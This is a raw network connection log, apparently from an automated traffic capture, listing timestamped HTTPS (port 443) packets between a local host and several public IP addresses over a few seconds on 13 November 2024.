Nov 13, 2024 20:39:29.839783907 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.840301991 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.840357065 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.840368986 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.843332052 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.843405008 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.843416929 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.867577076 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.867587090 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.867810011 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.908782005 CET	49769	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.908833981 CET	443	49769	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.909409046 CET	49769	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.909976959 CET	49769	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.909991026 CET	443	49769	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.910310030 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.910521984 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.910608053 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:30.015655041 CET	443	49765	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:30.028966904 CET	443	49767	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:30.047368050 CET	443	49766	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:30.059870005 CET	443	49768	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:30.062112093 CET	49765	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:30.076070070 CET	49767	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:30.092067003 CET	49766	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:30.099292040 CET	49768	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:30.111854076 CET	49765	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:30.111910105 CET	443	49765	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:30.112010002 CET	49767	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:30.112025976 CET	443	49767	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:30.112459898 CET	49765	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:30.112459898 CET	49767	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:30.112474918 CET	443	49765	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:30.112505913 CET	443	49767	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:30.119219065 CET	49766	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:30.119230986 CET	443	49766	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:30.119956970 CET	49766	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:30.119962931 CET	443	49766	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:30.120548964 CET	49768	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:30.120605946 CET	443	49768	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:30.120920897 CET	49768	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:30.120937109 CET	443	49768	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:30.237612963 CET	443	49767	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:30.238353968 CET	443	49767	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:30.238449097 CET	49767	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:30.238550901 CET	49767	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:30.238552094 CET	49767	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:30.238554001 CET	443	49765	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:30.238594055 CET	443	49767	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:30.238626003 CET	443	49767	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:30.238642931 CET	443	49765	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:30.238699913 CET	49765	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:30.240087986 CET	49765	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:30.240088940 CET	49765	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:30.240106106 CET	443	49765	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:30.240125895 CET	443	49765	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:30.247432947 CET	49773	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:30.247468948 CET	49774	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:30.247493029 CET	443	49773	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:30.247513056 CET	443	49774	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:30.247550964 CET	49773	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:30.247580051 CET	49774	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:30.247708082 CET	49773	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:30.247721910 CET	443	49773	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:30.247823000 CET	49774	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:30.247843981 CET	443	49774	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:30.272871971 CET	443	49768	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:30.273430109 CET	443	49768	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:30.273509979 CET	49768	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:30.274406910 CET	49768	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:30.274406910 CET	49768	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:30.274435043 CET	443	49766	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:30.274465084 CET	443	49768	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:30.274492979 CET	443	49768	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:30.274667025 CET	443	49766	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:30.274723053 CET	49766	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:30.275703907 CET	49766	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:30.275722027 CET	443	49766	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:30.275733948 CET	49766	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:30.275738001 CET	443	49766	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:30.278460979 CET	49775	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:30.278501987 CET	443	49775	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:30.278701067 CET	49775	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:30.278701067 CET	49775	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:30.278760910 CET	443	49775	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:30.278990030 CET	49776	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:30.279028893 CET	443	49776	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:30.279136896 CET	49776	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:30.279230118 CET	49776	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:30.279244900 CET	443	49776	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:30.655642986 CET	443	49769	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:30.656214952 CET	49769	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:30.656245947 CET	443	49769	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:30.656872034 CET	49769	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:30.656881094 CET	443	49769	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.040970087 CET	443	49769	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.041426897 CET	443	49769	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.041651964 CET	49769	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.041836977 CET	49769	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.041836977 CET	49769	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.041857958 CET	443	49769	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.041866064 CET	443	49769	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.045247078 CET	49778	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.045275927 CET	443	49778	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.045346022 CET	49778	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.045531034 CET	49778	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.045542002 CET	443	49778	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.045618057 CET	443	49774	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.045984030 CET	49774	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.046019077 CET	443	49774	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.046376944 CET	49774	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.046395063 CET	443	49774	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.049355030 CET	443	49776	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.049710035 CET	443	49775	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.050162077 CET	49775	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.050180912 CET	443	49775	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.050209045 CET	49776	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.050224066 CET	443	49776	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.050393105 CET	49776	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.050398111 CET	443	49776	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.050606012 CET	49775	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.050611973 CET	443	49775	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.063618898 CET	443	49773	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.064011097 CET	49773	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.064028978 CET	443	49773	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.064425945 CET	49773	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.064433098 CET	443	49773	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.172581911 CET	443	49774	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.173821926 CET	443	49774	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.173912048 CET	49774	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.177887917 CET	443	49776	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.178065062 CET	443	49776	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.178215027 CET	49776	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.179744959 CET	49774	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.179783106 CET	443	49774	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.181224108 CET	443	49775	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.181310892 CET	443	49775	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.181689024 CET	49775	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.181910038 CET	49776	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.181930065 CET	443	49776	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.181984901 CET	49776	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.181991100 CET	443	49776	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.182952881 CET	49775	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.182975054 CET	443	49775	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.185481071 CET	49779	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.185584068 CET	443	49779	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.185745955 CET	49779	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.186794996 CET	49780	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.186836004 CET	443	49780	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.186978102 CET	49780	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.187237978 CET	49779	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.187273979 CET	443	49779	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.188529015 CET	49781	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.188623905 CET	443	49781	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.188731909 CET	49781	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.188819885 CET	49780	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.188848019 CET	443	49780	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.188955069 CET	49781	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.188990116 CET	443	49781	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.195362091 CET	443	49773	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.195846081 CET	443	49773	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.195967913 CET	49773	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.196085930 CET	49773	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.196101904 CET	443	49773	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.196118116 CET	49773	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.196127892 CET	443	49773	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.199161053 CET	49782	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.199178934 CET	443	49782	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.199229002 CET	49782	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.199619055 CET	49782	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.199635029 CET	443	49782	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.804167032 CET	443	49778	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.804682970 CET	49778	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.804732084 CET	443	49778	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.805334091 CET	49778	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.805347919 CET	443	49778	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.811391115 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:31.811429977 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:31.811491966 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:31.811661959 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:31.811675072 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:31.929305077 CET	443	49780	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.929766893 CET	49780	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.929776907 CET	443	49780	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.930265903 CET	49780	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.930270910 CET	443	49780	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.934019089 CET	443	49781	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.934391975 CET	49781	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.934454918 CET	443	49781	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.934793949 CET	49781	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.934808016 CET	443	49781	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.937999010 CET	443	49778	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.938379049 CET	443	49778	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.938498020 CET	49778	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.938498020 CET	49778	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.938498020 CET	49778	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.940869093 CET	49786	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.940905094 CET	443	49786	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.940973043 CET	49786	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.941131115 CET	49786	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.941143990 CET	443	49786	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.941788912 CET	443	49782	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.942091942 CET	49782	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.942126036 CET	443	49782	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.942491055 CET	49782	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.942498922 CET	443	49782	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.955979109 CET	443	49779	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.956573009 CET	49779	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.956636906 CET	443	49779	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:31.956974030 CET	49779	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:31.956990957 CET	443	49779	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.058535099 CET	443	49780	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.059221983 CET	443	49780	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.059326887 CET	49780	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.059748888 CET	49780	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.059748888 CET	49780	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.059756994 CET	443	49780	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.059765100 CET	443	49780	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.062433958 CET	49787	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.062496901 CET	443	49787	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.062594891 CET	49787	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.062668085 CET	443	49781	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.062799931 CET	49787	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.062819958 CET	443	49787	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.063147068 CET	443	49781	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.063225985 CET	49781	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.063312054 CET	49781	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.063313007 CET	49781	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.063359022 CET	443	49781	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.063390970 CET	443	49781	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.065131903 CET	49788	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.065228939 CET	443	49788	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.065321922 CET	49788	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.065443993 CET	49788	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.065479040 CET	443	49788	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.072427034 CET	443	49782	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.072496891 CET	443	49782	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.072547913 CET	49782	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.072618961 CET	49782	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.072618961 CET	49782	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.072633028 CET	443	49782	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.072640896 CET	443	49782	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.074563026 CET	49789	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.074593067 CET	443	49789	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.074662924 CET	49789	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.074776888 CET	49789	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.074789047 CET	443	49789	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.093127966 CET	443	49779	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.094533920 CET	443	49779	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.094619036 CET	49779	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.094619989 CET	49779	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.094666004 CET	49779	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.094686985 CET	443	49779	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.096338034 CET	49790	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.096368074 CET	443	49790	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.096430063 CET	49790	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.096540928 CET	49790	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.096550941 CET	443	49790	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.245368958 CET	49778	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.245405912 CET	443	49778	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.277873993 CET	49791	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:32.277978897 CET	443	49791	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:32.278070927 CET	49791	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:32.278270960 CET	49791	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:32.278291941 CET	443	49791	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:32.688939095 CET	443	49786	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.689327002 CET	49786	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.689335108 CET	443	49786	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.689784050 CET	49786	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.689786911 CET	443	49786	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.700738907 CET	49793	443	192.168.2.5	184.28.90.27
Nov 13, 2024 20:39:32.700794935 CET	443	49793	184.28.90.27	192.168.2.5
Nov 13, 2024 20:39:32.700881004 CET	49793	443	192.168.2.5	184.28.90.27
Nov 13, 2024 20:39:32.702380896 CET	49793	443	192.168.2.5	184.28.90.27
Nov 13, 2024 20:39:32.702404976 CET	443	49793	184.28.90.27	192.168.2.5
Nov 13, 2024 20:39:32.702650070 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:32.702877998 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:32.702898026 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:32.703860044 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:32.703924894 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:32.704865932 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:32.704927921 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:32.705068111 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:32.705077887 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:32.745309114 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:32.796272039 CET	443	49787	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.796962023 CET	49787	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.796989918 CET	443	49787	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.797425032 CET	49787	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.797430992 CET	443	49787	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.803669930 CET	49794	443	192.168.2.5	142.250.181.238
Nov 13, 2024 20:39:32.803718090 CET	443	49794	142.250.181.238	192.168.2.5
Nov 13, 2024 20:39:32.803786039 CET	49794	443	192.168.2.5	142.250.181.238
Nov 13, 2024 20:39:32.804008007 CET	49794	443	192.168.2.5	142.250.181.238
Nov 13, 2024 20:39:32.804020882 CET	443	49794	142.250.181.238	192.168.2.5
Nov 13, 2024 20:39:32.805299997 CET	443	49789	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.805692911 CET	49789	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.805712938 CET	443	49789	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.806117058 CET	49789	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.806121111 CET	443	49789	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.810502052 CET	443	49788	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.810858965 CET	49788	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.810902119 CET	443	49788	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.811326027 CET	49788	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.811331987 CET	443	49788	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.822774887 CET	443	49786	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.822936058 CET	443	49786	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.823005915 CET	49786	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.823035955 CET	49786	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.823035955 CET	49786	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.823052883 CET	443	49786	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.823062897 CET	443	49786	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.825517893 CET	49795	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.825548887 CET	443	49795	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.825614929 CET	49795	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.825746059 CET	49795	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.825754881 CET	443	49795	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.852098942 CET	443	49790	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.852694035 CET	49790	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.852730989 CET	443	49790	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.853069067 CET	49790	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.853079081 CET	443	49790	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.926265955 CET	443	49787	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.926517963 CET	443	49787	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.926558018 CET	49787	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.926587105 CET	49787	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.926604986 CET	443	49787	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.926616907 CET	49787	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.926621914 CET	443	49787	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.929697990 CET	49797	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.929707050 CET	443	49797	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.929764986 CET	49797	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.930025101 CET	49797	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.930035114 CET	443	49797	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.935076952 CET	443	49789	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.935261965 CET	443	49789	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.935323000 CET	49789	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.935353994 CET	49789	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.935359955 CET	443	49789	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.935372114 CET	49789	443	192.168.2.5	13.107.246.45
